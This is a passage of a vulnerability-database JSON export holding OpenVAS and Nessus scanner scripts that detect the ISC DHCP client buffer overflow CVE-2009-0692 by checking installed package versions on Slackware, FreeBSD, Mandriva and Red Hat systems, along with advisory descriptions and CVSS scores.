rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"dhcp\", ver:\"3.1.2p1-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-02T21:14:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-12-23T00:00:00", "published": "2009-07-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64447", "id": "OPENVAS:64447", "title": "FreeBSD Ports: isc-dhcp31-client", "type": "openvas", "sourceData": "#\n#VID c444c8b7-7169-11de-9ab7-000c29a67389\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c444c8b7-7169-11de-9ab7-000c29a67389\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n isc-dhcp31-client\n isc-dhcp30-client\n\nCVE-2009-0692\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before\n4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers\nto execute arbitrary code via a crafted subnet-mask option.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttps://www.isc.org/node/468\nhttp://secunia.com/advisories/35785\nhttp://www.kb.cert.org/vuls/id/410676\nhttp://www.vuxml.org/freebsd/c444c8b7-7169-11de-9ab7-000c29a67389.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(64447);\n script_version(\"$Revision: 4847 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-23 10:33:16 +0100 (Fri, 23 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: isc-dhcp31-client\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"isc-dhcp31-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.1.1\")<=0) {\n txt += 'Package isc-dhcp31-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"isc-dhcp30-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.0.7\")<=0) {\n txt += 'Package isc-dhcp30-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:33", "bulletinFamily": "scanner", "description": "The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:151.", "modified": "2017-07-06T00:00:00", "published": "2009-07-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64393", "id": "OPENVAS:64393", "title": "Mandrake Security Advisory MDVSA-2009:151 (dhcp)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_151.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:151 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability has been found and corrected in ISC DHCP:\n\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0\nbefore 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP\nservers to execute arbitrary code via a crafted subnet-mask option\n(CVE-2009-0692).\n\nThis update provides fixes for this vulnerability.\n\nAffected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:151\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory MDVSA-2009:151.\";\n\n \n\nif(description)\n{\n script_id(64393);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:151 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.6~5.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.7~1.3mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-doc\", rpm:\"dhcp-doc~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~4.1.0~5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_3.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0.4~2.2.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-client\", rpm:\"dhcp-client~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-relay\", rpm:\"dhcp-relay~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-server\", rpm:\"dhcp-server~3.0~1.rc14.0.2.C30mdk\", rls:\"MNDK_2.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-24T18:21:36", "bulletinFamily": "scanner", "description": "This host has installed ISC DHCP Client and is prone to Buffer\n overflow Vulnerability.", "modified": "2018-09-22T00:00:00", "published": "2009-07-23T00:00:00", "id": "OPENVAS:1361412562310900694", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900694", "title": "ISC DHCP Client Buffer Overflow Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_isc_dhcp_client_bof_vuln.nasl 11554 2018-09-22 15:11:42Z cfischer $\n#\n# ISC DHCP Client Buffer Overflow Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900694\");\n script_version(\"$Revision: 11554 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-22 17:11:42 +0200 (Sat, 22 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-23 21:05:26 +0200 (Thu, 23 Jul 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_name(\"ISC DHCP Client Buffer Overflow Vulnerability\");\n script_xref(name:\"URL\", value:\"https://www.isc.org/node/468\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/35785\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/410676\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/1891\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_isc_dhcp_client_detect.nasl\", \"gather-package-list.nasl\");\n script_mandatory_keys(\"ISC/DHCP-Client/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to run arbitrary code, corrupt memory,\n and can cause denial of service.\");\n script_tag(name:\"affected\", value:\"ISC DHCP dhclient 4.1 before 4.1.0p1\n ISC DHCP dhclient 4.0 before 4.0.1p1\n ISC DHCP dhclient 3.1 before 3.1.2p1\n ISC DHCP dhclient all versions in 3.0\n and 2.0 series.\");\n script_tag(name:\"insight\", value:\"The flaw is due to a boundary error within the 'script_write_params()'\n function in 'client/dhclient.c' which can be exploited to cause a stack-based\n buffer overflow by sending an overly long subnet-mask option.\");\n script_tag(name:\"solution\", value:\"Upgrade to version 4.1.0p1, 4.0.1p1, or 3.1.2p1 or later\n For updates refer to https://www.isc.org/downloadables/\");\n script_tag(name:\"summary\", value:\"This host has installed ISC DHCP Client and is prone to Buffer\n overflow Vulnerability.\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nrelease = \"\";\nrelease = get_kb_item(\"ssh/login/release\");\n\n#RHEL 5 not affected by this vulnerability\nif(release && release == \"RHENT_5\"){\n exit(0);\n}\n\ndhcpVer = get_kb_item(\"ISC/DHCP-Client/Ver\");\nif(!dhcpVer){\n exit(0);\n}\n\nif(dhcpVer =~ \"^4\\.1\")\n{\n if(version_is_less(version:dhcpVer, test_version:\"4.1.0.p1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nelse if(dhcpVer =~ \"^4\\.0\")\n{\n if(version_is_less(version:dhcpVer, test_version:\"4.0.1.p1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nelse if(dhcpVer =~ \"^3\\.1\")\n{\n if(version_is_less(version:dhcpVer, test_version:\"3.1.2.p1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n\nelse if((dhcpVer =~ \"^3\\.0\") || (dhcpVer =~ \"^2\\.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:39", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2018-04-06T00:00:00", "published": "2009-07-29T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064447", "id": "OPENVAS:136141256231064447", "title": "FreeBSD Ports: isc-dhcp31-client", "type": "openvas", "sourceData": "#\n#VID c444c8b7-7169-11de-9ab7-000c29a67389\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID c444c8b7-7169-11de-9ab7-000c29a67389\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n isc-dhcp31-client\n isc-dhcp30-client\n\nCVE-2009-0692\nStack-based buffer overflow in the script_write_params method in\nclient/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before\n4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers\nto execute arbitrary code via a crafted subnet-mask option.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttps://www.isc.org/node/468\nhttp://secunia.com/advisories/35785\nhttp://www.kb.cert.org/vuls/id/410676\nhttp://www.vuxml.org/freebsd/c444c8b7-7169-11de-9ab7-000c29a67389.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64447\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: isc-dhcp31-client\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"isc-dhcp31-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.1.1\")<=0) {\n txt += 'Package isc-dhcp31-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"isc-dhcp30-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.0.7\")<=0) {\n txt += 'Package isc-dhcp30-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:12:03", "bulletinFamily": "scanner", "description": "Updated dhcp packages that fix a security issue are now available for Red Hat Enterprise Linux 4 and 4.7 Extended Update Support.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer overflow flaw in the ISC DHCP client. If the DHCP client were to receive a malicious DHCP response, it could crash or execute arbitrary code with the permissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-11-27T00:00:00", "id": "REDHAT-RHSA-2009-1136.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=39798", "published": "2009-07-15T00:00:00", "title": "RHEL 4 : dhcp (RHSA-2009:1136)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1136. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39798);\n script_version (\"1.23\");\n script_cvs_date(\"Date: 2018/11/27 13:31:32\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_bugtraq_id(35668);\n script_xref(name:\"RHSA\", value:\"2009:1136\");\n\n script_name(english:\"RHEL 4 : dhcp (RHSA-2009:1136)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dhcp packages that fix a security issue are now available for\nRed Hat Enterprise Linux 4 and 4.7 Extended Update Support.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Dynamic Host Configuration Protocol (DHCP) is a protocol that\nallows individual devices on an IP network to get their own network\nconfiguration information, including an IP address, a subnet mask, and\na broadcast address.\n\nThe Mandriva Linux Engineering Team discovered a stack-based buffer\noverflow flaw in the ISC DHCP client. If the DHCP client were to\nreceive a malicious DHCP response, it could crash or execute arbitrary\ncode with the permissions of the client (root). (CVE-2009-0692)\n\nUsers of DHCP should upgrade to these updated packages, which contain\na backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-0692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1136\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dhclient, dhcp and / or dhcp-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 